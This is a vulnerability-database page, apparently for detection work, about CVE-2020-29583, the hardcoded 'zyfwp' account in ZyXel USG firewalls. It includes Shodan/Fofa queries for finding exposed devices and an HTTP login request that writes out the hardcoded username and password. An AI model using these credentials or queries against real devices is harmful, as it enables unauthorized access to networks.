🔙 목록으로 돌아가기

CVE-2020-29583: ZyXel USG - Hardcoded Credentials

TitleZyXel USG - Hardcoded Credentials
Authorcanberbamber
SeverityCritical
ImpactAn attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network.
RemediationUpdate the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.
CVSS Score9.8
EPSS Score0.94367
CVE IDCVE-2020-29583
CWE IDCWE-522
Shodan Querytitle:"USG FLEX 100"http.title:"usg flex 100"
Fofa Querytitle="usg flex 100"
Tags cve cve2020 ftp-backdoor zyxel bypass kev vkev vuln

🔍 Vulnerability Description

A hardcoded credential vulnerability was identified in the ‘zyfwp’ user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.

🌐 HTTP Request

GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
GET /ext-js/index.html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-29583.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-29583.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A